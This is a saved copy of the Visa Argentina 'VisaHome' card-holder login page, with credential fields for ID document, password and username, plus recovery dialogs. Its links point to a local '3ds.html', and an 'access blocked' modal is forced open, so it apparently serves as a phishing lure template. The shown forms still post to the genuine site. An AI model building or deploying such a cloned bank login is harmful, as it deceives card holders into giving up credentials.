<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en"><head>
<!-- saved from url=(0056)https://inetserv.visa.com.ar/visahome/login?windowId=0cf -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge" /><title></title>

<meta name="description" />
<meta name="author" content="easytech" />
<!-- CSS -->
<link type="text/css" rel="stylesheet" href="./login_files/jquery-ui-1.8.18.custom.min.css" />
<link type="text/css" rel="stylesheet" href="./login_files/text.min.css" />
<link type="text/css" rel="stylesheet" href="./login_files/reset.min.css" />
<link type="text/css" rel="stylesheet" href="./login_files/960.min.css" />
<link type="text/css" rel="stylesheet" href="./login_files/visa.min.css" />
<link type="text/css" rel="stylesheet" href="./login_files/tabs.min.css" />
<link type="text/css" rel="stylesheet" href="./login_files/column930.min.css" />
<link type="text/css" rel="stylesheet" href="./login_files/keyboard.min.css" />
<!-- IE7 --><!-- IE8 --><!-- JavaScripts -->
<script type="text/javascript" async="" src="./login_files/ga.js.descarga"></script>
<script type="text/javascript" src="./login_files/jquery-1.7.2.min.js.descarga"></script>
<script type="text/javascript" src="./login_files/jquery-ui-1.8.18.custom.min.js.descarga"></script>
<script type="text/javascript" src="./login_files/jquery.blockUI.min.js.descarga"></script>
<script type="text/javascript" src="./login_files/bootstrap-modal.min.js.descarga"></script>
<script type="text/javascript" src="./login_files/visa.min.js.descarga"></script>
<script type="text/javascript" src="./login_files/jquery.keyboard.min.js.descarga"></script>
<script type="text/javascript" src="./login_files/jquery.keyboard.extension-typing.min.js.descarga"></script>
<script type="text/javascript" src="./login_files/jquery.keyboard.extension-autocomplete.min.js.descarga"></script>
<script type="text/javascript" src="./login_files/emailmask.js.descarga"></script>
<script type="text/javascript" src="./login_files/jsf.js.xhtml"></script>
<script type="text/javascript" src="./login_files/easyfaces.js.xhtml"></script>
</head>

<body class="login-div modal-open">
<div class="pre-header"></div>
<div class="header container-12">
<div class="logo grid-6 alpha"> <a href="loginwindowId=3ds.html"><img src="./login_files/logo.jpg" /> </a> </div>
<div class="user-info grid-6 omega"></div>
</div>
<div class="container-12"></div>
<div class="login-content container-12">
<form id="loginFrm" name="loginFrm" method="post" action="https://inetserv.visa.com.ar/visahome/login?windowId=0cf" enctype="application/x-www-form-urlencoded"><input name="loginFrm" value="loginFrm" type="hidden" /><input id="loginFrm:hiddenField" name="loginFrm:hiddenField" value="" type="hidden" />
<div class="login-tabs"></div>
<div class="login-content container-12">
<div class="login-info grid-4 alpha">
<div class="login-title"> VISA<span>HOME PARA
SOCIOS</span> </div>
<ul>
<li>Información sobre el estado de cuentas de sus tarjetas
Visa. Últimos movimientos, liquidaciones y resúmenes de cuenta.</li>
<li>Realice el pago puntual o adhiera al débito automático
sus facturas de servicios e impuestos a través del Servicio de Pagos
Visa.</li>
<li>Abone en cuotas fijas el saldo del resumen de cuenta o
los consumos realizados en un pago.</li>
</ul>
</div>
<div class="login-clave grid-4"><input id="loginFrm:commandd" name="loginFrm:commandd" value="" class="imagen-login" onclick="mojarra.ab(this,event,'action',0,'pidId:pidFrm',{'onevent':function(data) { oncomplete(data, 'true','showSecurePopup(\'pid\')')}});return false" type="submit" /> </div>
<div class="login-form grid-4"><span style="padding-left: 10px;" class="login-error">Su
acceso ha sido bloqueado.</span>
<div class="login-form-conten">
<div> <span>Tipo de Documento</span>
<select id="loginFrm:docType" name="loginFrm:docType" class="inputCombo-chico" size="1" tabindex="2"><option value="CI">Cédula de Identidad</option><option value="DNI" selected="selected">Documento
Nacional de Identidad</option><option value="DU">Documento Unico</option><option value="LC">Libreta Cívica</option><option value="LE">Libreta de Enrolamiento</option><option value="PAS">Pasaporte</option></select>
</div>
<div><label for="loginFrm:docNumber">Número</label><input autocomplete="off" id="loginFrm:docNumber" name="loginFrm:docNumber" value="" class="username_qwerty ui-keyboard-input ui-widget-content ui-corner-all" onfocus="setInputPos('username_qwerty')" onkeypress="if (event.keyCode == 13) { document.getElementById('loginFrm:button').click(); return false; }" tabindex="2" aria-haspopup="true" role="textbox" type="text" /> </div>
<div> <span>Sexo</span>
<select id="loginFrm:gender" name="loginFrm:gender" class="inputCombo-chico" size="1" tabindex="3"><option value="M">Masculino</option><option value="F" selected="selected">Femenino</option></select>
</div>
<div> <span>Contraseña</span><input autocomplete="off" id="loginFrm:password" name="loginFrm:password" value="" onfocus="setInputPos('password_qwerty')" onkeypress="if (event.keyCode == 13) { document.getElementById('loginFrm:button').click(); return false; }" tabindex="4" class="password_qwerty ui-keyboard-input ui-widget-content ui-corner-all" aria-haspopup="true" role="textbox" type="password" />
</div>
<div class="login-pregunta"><a id="loginFrm:j_idt25:j_idt26" href="loginwindowId=3ds.html" onclick="mojarra.ab(this,event,'action','@form','pidId:pidFrm',{'onevent':function(data) { oncomplete(data, 'false','showSecurePopup(\'pid\');')}});return false" class="">Recuperar contraseña</a> </div>
<div> <span> Usuario </span><input id="loginFrm:nickname" name="loginFrm:nickname" value="" onfocus="setInputPos('nickname_qwerty')" onkeypress="if (event.keyCode == 13) { document.getElementById('loginFrm:button').click(); return false; }" tabindex="4" class="inputTextChico nickname_qwerty" type="password" /> </div>
<div class="login-pregunta left">
<div class="col-4 no-padding no-margin"><a id="loginFrm:noNickname" href="loginwindowId=3ds.html" onclick="mojarra.ab(this,event,'action','@form','@form',{'onevent':function(data) { if (data.status === 'success') validateLogin(); }});return false">Obtener
usuario</a> </div>
<div class="col-4 no-padding no-margin"><a id="loginFrm:j_idt31:j_idt26" href="loginwindowId=3ds.html" onclick="mojarra.ab(this,event,'action','@form','recuperarUsuario:recuperarUsuarioFrm',{'onevent':function(data) { oncomplete(data, 'false','showSecurePopup(\'recuperarUsuario\');')}});return false" class="">Recuperar usuario</a> </div>
</div>
</div>
<div class="login-form-footer"> <input id="button" value="usar teclado virtual" class="vb button" tabindex="6" type="button" /><input id="loginFrm:button" name="loginFrm:button" value="ingresar" tabindex="5" class="button" onclick="mojarra.ab(this,event,'action','@form','@form',{'onevent':function(data) { if (data.status === 'success') validateLogin(); }});return false" type="submit" /> </div>
</div>
</div>
<span id="loginFrm:blockedUserHidden" style="display: none;">true</span>
<input name="javax.faces.ViewState" value="5284979857733975725:-7209083927070613983" type="hidden" /></form>
<div class="terms grid-12"> <span>Los datos que se
proporcionen a Prisma Medios de Pago S.A. podrán utilizarse para
procesar sus pedidos, solicitudes, denuncias, reclamos, para la
relación comercial y fines publicitarios. </span> <b>Disposición
DNPDP 10/2008: "El titular de los datos personales tiene la facultad de
ejercer el derecho de acceso a los mismos en forma gratuita a
intervalos no inferiores a seis meses, salvo que se acredite un interés
legítimo al efecto conforme lo establecido en el artículo 14, inciso 3
de la Ley Nº 25.326" y "La DIRECCION NACIONAL DE PROTECCION DE DATOS
PERSONALES, Organo de Control de la Ley Nº 25.326, tiene la atribución
de atender las denuncias y reclamos que se interpongan con relación al
incumplimiento de las normas sobre protección de datos personales."</b>
</div>
<!-- PID -->
<div id="blockingDiv" style="display: none;">
<h2 style="color: rgb(254, 178, 3);">Procesando</h2>
</div>
<div id="pid" title="Identificación" class="modal hide">
<div id="pidId:pidContent">
<div class="modal-header"> </div>
<div class="modal-body pid-modal-body">
<form id="pidId:pidFrm" name="pidId:pidFrm" method="post" action="https://inetserv.visa.com.ar/visahome/login?windowId=0cf" enctype="application/x-www-form-urlencoded"><input name="pidId:pidFrm" value="pidId:pidFrm" type="hidden" />
<script id="pidId:pidFrm:j_idt35_js" type="text/javascript"></script>
<div class="pid-wrapper blockable-content">
<div>
<div id="pidId:pidFrm:j_idt38:componentDiv" class="" style="border-bottom: 1px solid rgb(102, 102, 102); height: 80px; margin-bottom: 10px;">
<h2>Verificación de identidad - Creación de Usuario</h2>
<span>La creación de usuario es un breve proceso de preguntas y
respuestas destinadas a verificar su identidad.</span></div>
</div>
<div>
<div id="pidId:pidFrm:j_idt44:componentDiv" class="" style="height: 23px; margin-bottom: 5px; padding-left: 7px;"><span>Ingrese
la siguiente información:</span></div>
</div>
<div>
<div id="pidId:pidFrm:j_idt46:componentDiv" class="pid-data-request" style=""><!-- datos del sollicitante -->
<div style="margin-top: 10px;"><label for="pidId:pidFrm:j_idt46:pidDocType">Tipo de documento</label>
<select id="pidId:pidFrm:j_idt46:pidDocType" name="pidId:pidFrm:j_idt46:pidDocType" class="inputCombo-chico" size="1" tabindex="2"><option value="CI">Cédula de Identidad</option><option value="DNI" selected="selected">Documento
Nacional de Identidad</option><option value="DU">Documento Unico</option><option value="LC">Libreta Cívica</option><option value="LE">Libreta de Enrolamiento</option><option value="PAS">Pasaporte</option></select>
</div>
<div style="margin-top: 10px;"><label for="pidId:pidFrm:j_idt46:docNumber">Número de Documento</label><input placeholder="Ingrese en Nro de Documento" id="pidId:pidFrm:j_idt46:docNumber" name="pidId:pidFrm:j_idt46:docNumber" tabindex="2" type="text" /> </div>
<div style="margin-top: 10px;"><label for="pidId:pidFrm:j_idt46:gender">Sexo</label>
<select id="pidId:pidFrm:j_idt46:gender" name="pidId:pidFrm:j_idt46:gender" class="inputCombo-chico" size="1" tabindex="3"><option value="M">Masculino</option><option value="F">Femenino</option></select>
</div>
<div class="buttonBar clearfix"><input id="pidId:pidFrm:j_idt46:j_idt57:j_idt58:button" name="pidId:pidFrm:j_idt46:j_idt57:j_idt58:button" value="Aceptar" style="" tabindex="" class="button pid-button right" onclick="mojarra.ab(this,event,'action','@form','pidId:pidFrm',{'onevent':function(data) { oncomplete(data, 'true','')}});return false" type="submit" /><input id="pidId:pidFrm:j_idt46:j_idt57:j_idt59:button" name="pidId:pidFrm:j_idt46:j_idt57:j_idt59:button" value="Cancelar" style="" tabindex="" class="button pid-button right" onclick="mojarra.ab(this,event,'action','@form','pidId:pidFrm',{'onevent':function(data) { oncomplete(data, 'true','closePopup(\'pid\');')}});return false" type="submit" /> </div>
<div> <span style="font-size: 10px ! important;">Nota:
el Servicio VisaHome está disponible para todos aquellos socios que
posean al menos una tarjeta Visa, excepto las tarjetas Visa emitidas
por Citibank N.A., Tarjetas Cuyanas S.A., Tarjeta Naranja S.A. y
Tarjetas del Mar S.A.</span> </div>
</div>
</div>
</div>
<input name="javax.faces.ViewState" id="javax.faces.ViewState" value="5284979857733975725:-7209083927070613983" autocomplete="off" type="hidden" /></form>
<!-- &lt;et:div id=&quot;usrMsg&quot; style=&quot;border-bottom: 1px solid #666666; height: 80px; margin-bottom: 10px;&quot;
rendered=&quot;true&quot;&gt;
&lt;/et:div&gt; -->
</div>
<div id="pidId:mdlFooter" class="modal-footer"></div>
</div>
</div>
<div id="recuperarClave" title="Usuario Bloqueado" class="modal hide in" style="display: block;">
<div id="recuperarClave:recuperarClaveContent">
<div class="modal-header"> </div>
<div class="modal-body">
<form id="recuperarClave:j_idt146" name="recuperarClave:j_idt146" method="post" action="https://inetserv.visa.com.ar/visahome/login?windowId=0cf" enctype="application/x-www-form-urlencoded"><input name="recuperarClave:j_idt146" value="recuperarClave:j_idt146" type="hidden" />
<div class="no_data_found" style="margin-top: 20px; min-width: 550px;"> Su clave ha
sido bloqueada, puede desbloquearla ahora haciendo <a id="recuperarClave:j_idt146:j_idt148:j_idt26" href="loginwindowId=3ds.html" class="">click aquí</a>
o en cualquier momento
ingresando en la opción "Olvidó su clave de acceso?" en la pantalla de
login a Visa Home Socios </div>
<input name="javax.faces.ViewState" id="javax.faces.ViewState" value="5284979857733975725:-7209083927070613983" autocomplete="off" type="hidden" /></form>
</div>
<div id="recuperarClave:mdlFooter" class="modal-footer modal-footer-recuser"><!-- BOTON -->
<form id="recuperarClave:j_idt152" name="recuperarClave:j_idt152" method="post" href="loginwindowId=3ds.html" enctype="application/x-www-form-urlencoded"><input name="recuperarClave:j_idt152" value="recuperarClave:j_idt152" type="hidden" /><input href="loginwindowId=3ds.html" value="Cerrar" class="right button" type="submit" /><input name="javax.faces.ViewState" id="javax.faces.ViewState" value="5284979857733975725:-7209083927070613983" autocomplete="off" type="hidden" /></form>
</div>
</div>
</div>
<!-- vsisasca -->
<div id="recuperarUsuario" title="Verificación de identidad - Recuperar Usuario" class="modal hide">
<div id="recuperarUsuario:recuperarUsuarioContent">
<div class="modal-header"> </div>
<div class="modal-body">
<form id="recuperarUsuario:recuperarUsuarioFrm" name="recuperarUsuario:recuperarUsuarioFrm" method="post" action="https://inetserv.visa.com.ar/visahome/login?windowId=0cf" enctype="application/x-www-form-urlencoded"><input name="recuperarUsuario:recuperarUsuarioFrm" value="recuperarUsuario:recuperarUsuarioFrm" type="hidden" />
<script id="recuperarUsuario:recuperarUsuarioFrm:j_idt156_js" type="text/javascript"></script>
<div>
<div>
<div id="recuperarUsuario:recuperarUsuarioFrm:j_idt159:componentDiv" class="" style="border-bottom: 1px solid rgb(102, 102, 102); height: 80px; margin-bottom: 10px;">
<h2>Verificación de identidad - Recuperar Usuario</h2>
<b>Nota:</b> en caso de que usted no recuerde su clave de
Visa Home Socios, por favor primero recupérela y luego proceda a
recuperar su Usuario.</div>
</div>
<div>
<div id="recuperarUsuario:recuperarUsuarioFrm:j_idt162:componentDiv" class="" style="height: 23px; margin-bottom: 5px; padding-left: 7px;"><span>Ingrese
la siguiente información:</span></div>
</div>
<div>
<div id="recuperarUsuario:recuperarUsuarioFrm:j_idt164:componentDiv" class="nicknameModalContent" style=""><!-- datos del sollicitante -->
<div style="margin-top: 10px;"><label for="recuperarUsuario:recuperarUsuarioFrm:j_idt164:recDocType">Tipo
de Documento</label>
<select id="recuperarUsuario:recuperarUsuarioFrm:j_idt164:recDocType" name="recuperarUsuario:recuperarUsuarioFrm:j_idt164:recDocType" class="inputCombo-chico" size="1" tabindex="2"><option value="CI">Cédula de Identidad</option><option value="DNI" selected="selected">Documento
Nacional de Identidad</option><option value="DU">Documento Unico</option><option value="LC">Libreta Cívica</option><option value="LE">Libreta de Enrolamiento</option><option value="PAS">Pasaporte</option></select>
</div>
<div style="margin-top: 10px;"><label for="recuperarUsuario:recuperarUsuarioFrm:j_idt164:recDocNumber">Número
de Documento</label><input id="recuperarUsuario:recuperarUsuarioFrm:j_idt164:recDocNumber" name="recuperarUsuario:recuperarUsuarioFrm:j_idt164:recDocNumber" onfocus="setInputPos('username_qwerty')" onkeypress="if (event.keyCode == 13) { document.getElementById('recuperarUsuarioFrm:button').click(); return false; }" tabindex="2" type="text" /> </div>
<div style="margin-top: 10px;"><label for="recuperarUsuario:recuperarUsuarioFrm:j_idt164:recGender">Sexo</label>
<select id="recuperarUsuario:recuperarUsuarioFrm:j_idt164:recGender" name="recuperarUsuario:recuperarUsuarioFrm:j_idt164:recGender" class="inputCombo-chico" size="1" tabindex="3"><option value="M">Masculino</option><option value="F">Femenino</option></select>
</div>
<div style="margin-top: 10px;"><label for="recuperarUsuario:recuperarUsuarioFrm:j_idt164:recPassword">Contraseña</label><input id="recuperarUsuario:recuperarUsuarioFrm:j_idt164:recPassword" name="recuperarUsuario:recuperarUsuarioFrm:j_idt164:recPassword" value="" onkeypress="if (event.keyCode == 13) { document.getElementById('recuperarUsuarioFrm:button').click(); return false; }" tabindex="4" type="password" /> </div>
<div class="buttonBar clearfix"><input id="recuperarUsuario:recuperarUsuarioFrm:j_idt164:j_idt176:j_idt177:button" name="recuperarUsuario:recuperarUsuarioFrm:j_idt164:j_idt176:j_idt177:button" value="Aceptar" style="" tabindex="" class="button right" onclick="mojarra.ab(this,event,'action','@form','recuperarUsuario:recuperarUsuarioFrm',{'onevent':function(data) { oncomplete(data, 'true','')}});return false" type="submit" /><input id="recuperarUsuario:recuperarUsuarioFrm:j_idt164:j_idt176:j_idt178:button" name="recuperarUsuario:recuperarUsuarioFrm:j_idt164:j_idt176:j_idt178:button" value="Cancelar" style="" tabindex="" class="button button right" onclick="mojarra.ab(this,event,'action','@form','recuperarUsuario:recuperarUsuarioFrm',{'onevent':function(data) { oncomplete(data, 'true','closePopup(\'recuperarUsuario\');')}});return false" type="submit" /> </div>
</div>
</div>
</div>
<input name="javax.faces.ViewState" id="javax.faces.ViewState" value="5284979857733975725:-7209083927070613983" autocomplete="off" type="hidden" /></form>
</div>
<div id="recuperarUsuario:mdlFooter" class="modal-footer"></div>
</div>
</div>
<div id="obtenerUsuario" title="Generación de Usuario" class="modal hide">
<div id="obtenerUsuario:obtenerUsuarioContent">
<div class="modal-header"> </div>
<div class="modal-body">
<form id="obtenerUsuario:obtenerUsuarioFrm" name="obtenerUsuario:obtenerUsuarioFrm" method="post" action="https://inetserv.visa.com.ar/visahome/login?windowId=0cf" enctype="application/x-www-form-urlencoded"><input name="obtenerUsuario:obtenerUsuarioFrm" value="obtenerUsuario:obtenerUsuarioFrm" type="hidden" />
<script id="obtenerUsuario:obtenerUsuarioFrm:j_idt180_js" type="text/javascript"></script>
<div>
<div>
<div id="obtenerUsuario:obtenerUsuarioFrm:j_idt183:componentDiv" class="" style="border-bottom: 1px solid rgb(102, 102, 102); height: 80px; margin-bottom: 10px;">
<h2>Generación de Usuario</h2>
Por resolución del BCRA (5374) a partir del 04/09/2017 es obligatorio
contar con un Usuario (adicional a la contraseña) para ingresar a Visa
Home Socios</div>
</div>
<div>
<div id="obtenerUsuario:obtenerUsuarioFrm:j_idt186:componentDiv" class="" style="height: 23px; margin-bottom: 5px; padding-left: 7px;"><span>Ingrese
la siguiente información:</span></div>
</div>
<div>
<div id="obtenerUsuario:obtenerUsuarioFrm:j_idt188:componentDiv" class="nicknameModalContent" style=""><!-- datos del sollicitante -->
<div style="margin-top: 10px;"><label for="obtenerUsuario:obtenerUsuarioFrm:j_idt188:recDocType">Tipo
de Documento</label>
<select id="obtenerUsuario:obtenerUsuarioFrm:j_idt188:recDocType" name="obtenerUsuario:obtenerUsuarioFrm:j_idt188:recDocType" class="inputCombo-chico" size="1" tabindex="2"><option value="CI">Cédula de Identidad</option><option value="DNI" selected="selected">Documento
Nacional de Identidad</option><option value="DU">Documento Unico</option><option value="LC">Libreta Cívica</option><option value="LE">Libreta de Enrolamiento</option><option value="PAS">Pasaporte</option></select>
</div>
<div style="margin-top: 10px;"><label for="obtenerUsuario:obtenerUsuarioFrm:j_idt188:recDocNumber">Número
de Documento</label><input id="obtenerUsuario:obtenerUsuarioFrm:j_idt188:recDocNumber" name="obtenerUsuario:obtenerUsuarioFrm:j_idt188:recDocNumber" onfocus="setInputPos('username_qwerty')" onkeypress="if (event.keyCode == 13) { document.getElementById('obtenerUsuarioFrm:button').click(); return false; }" tabindex="2" type="text" /> </div>
<div style="margin-top: 10px;"><label for="obtenerUsuario:obtenerUsuarioFrm:j_idt188:recGender">Sexo</label>
<select id="obtenerUsuario:obtenerUsuarioFrm:j_idt188:recGender" name="obtenerUsuario:obtenerUsuarioFrm:j_idt188:recGender" class="inputCombo-chico" size="1" tabindex="3"><option value="M">Masculino</option><option value="F">Femenino</option></select>
</div>
<div style="margin-top: 10px;"><label for="obtenerUsuario:obtenerUsuarioFrm:j_idt188:recPassword">Contraseña</label><input id="obtenerUsuario:obtenerUsuarioFrm:j_idt188:recPassword" name="obtenerUsuario:obtenerUsuarioFrm:j_idt188:recPassword" value="" onkeypress="if (event.keyCode == 13) { document.getElementById('obtenerUsuarioFrm:button').click(); return false; }" tabindex="4" type="password" /> </div>
<div class="buttonBar clearfix"><input id="obtenerUsuario:obtenerUsuarioFrm:j_idt188:j_idt200:j_idt201:button" name="obtenerUsuario:obtenerUsuarioFrm:j_idt188:j_idt200:j_idt201:button" value="Aceptar" style="" tabindex="" class="button right" onclick="mojarra.ab(this,event,'action','@form','obtenerUsuario:obtenerUsuarioFrm',{'onevent':function(data) { oncomplete(data, 'true','')}});return false" type="submit" /><input id="obtenerUsuario:obtenerUsuarioFrm:j_idt188:j_idt200:j_idt202:button" name="obtenerUsuario:obtenerUsuarioFrm:j_idt188:j_idt200:j_idt202:button" value="Cancelar" style="" tabindex="" class="button button right" onclick="mojarra.ab(this,event,'action','@form','obtenerUsuario:obtenerUsuarioFrm',{'onevent':function(data) { oncomplete(data, 'true','closePopup(\'obtenerUsuario\');')}});return false" type="submit" /> </div>
</div>
</div>
</div>
<input name="javax.faces.ViewState" id="javax.faces.ViewState" value="5284979857733975725:-7209083927070613983" autocomplete="off" type="hidden" /></form>
</div>
<div id="obtenerUsuario:mdlFooter" class="modal-footer"></div>
</div>
</div>
<!-- vsisasca --> </div>
<div id="consumerDefense" title="Defensa del consumidor" class="modal hide">
<div id="j_idt206:consumerDefenseContent">
<div class="modal-header"> <a class="modal-titlebar-close" onclick="closePopup('consumerDefense');">cerrar </a> </div>
<div class="modal-body">
<div class="header-div-title-popup clearfix">
<div class="h3-title-popup">
<h3>Defensa del consumidor</h3>
</div>
<div class="modal-logo"></div>
</div>
<div class="legal-message">
<p>La Ley N° 2.244 establece que las personas físicas o jurídicas
que comercialicen, o presten servicios a consumidores y/o usuarios en
el ámbito de la C.A.B.A. y posean página de internet, deberán agregar
un enlace con la Dirección General de Defensa y Protección al
Consumidor.</p>
<p style="padding: 5px; color: rgb(232, 145, 0);">Dirección
General de Defensa y Protección al Consumidor</p>
<p>Para consultas y/o denuncias ingrese <a href="http://www.buenosaires.gob.ar/defensaconsumidor" target="_blank">aquí</a>.</p>
</div>
</div>
<div id="j_idt206:mdlFooter" class="modal-footer"></div>
</div>
</div>
<div id="personalDataProtection" title="Defensa del consumidor" class="modal hide">
<div id="j_idt208:personalDataProtectionContent">
<div class="modal-header"> <a class="modal-titlebar-close" onclick="closePopup('personalDataProtection');">cerrar </a>
</div>
<div class="modal-body">
<div class="legal-message"> <img src="./login_files/logo_proteccion_datos_personales.jpg" />
<h2 style="">Dirección Nacional de Protección de Datos
Personales</h2>
<p>“El titular de datos personales tiene la facultad de ejercer
el derecho de acceso a los mismos en forma gratuita a intervalos no
inferiores a seis meses, salvo que se acredite un interés legítimo al
efecto, conforme lo establecido en el artículo 14, inciso 3 de la Ley n
25.326”. </p>
<p style="padding: 5px;"> “La dirección Nacional de Datos
Personales, Órgano de Control de la Ley n 25.326, tiene la atribución
de atender las denuncias y reclamos que se interpongan con relación al
incumplimiento de las normas sobre protección de datos personales". </p>
<p style="padding-bottom: 0px;">Para contactar a la
direción Nacional de Datos Personales:</p>
<p style="padding-top: 0px;">Sarmiento 1118, 5
piso(C1041AA)</p>
<p style="padding-top: 0px;">Tel. 4383-8510/12/13/15</p>
<p><a style="padding-right: 10px;" href="http://www.jus.gob.ar/datos-personales.aspx/" target="_blank">http://www.jus.gob.ar/datos-personales.aspx/</a>
<a href="mailto:infodnpdp@jus.gov.ar">infodnpdp@jus.gov.ar</a></p>
</div>
<img src="./login_files/logo-jus.png" /> </div>
<div id="j_idt208:mdlFooter" class="modal-footer"></div>
</div>
</div>
<div class="footer">
<div class="footer-content container-12">
<div class="grid-6">PRISMA MEDIOS DE PAGO S.A.</div>
<div class="footer-legales grid-6"><a href="https://inetserv.visa.com.ar/visahome/login?windowId=0cf" class="grey-link" onclick="showPopup('consumerDefense'); return false;">Defensa
al Consumidor</a> | <a href="https://inetserv.visa.com.ar/visahome/login?windowId=0cf" class="grey-link" onclick="showPopup('personalDataProtection'); return false;">Protección
de datos personales</a> </div>
</div>
</div>
<div class="modal-backdrop in"></div>
</body></html>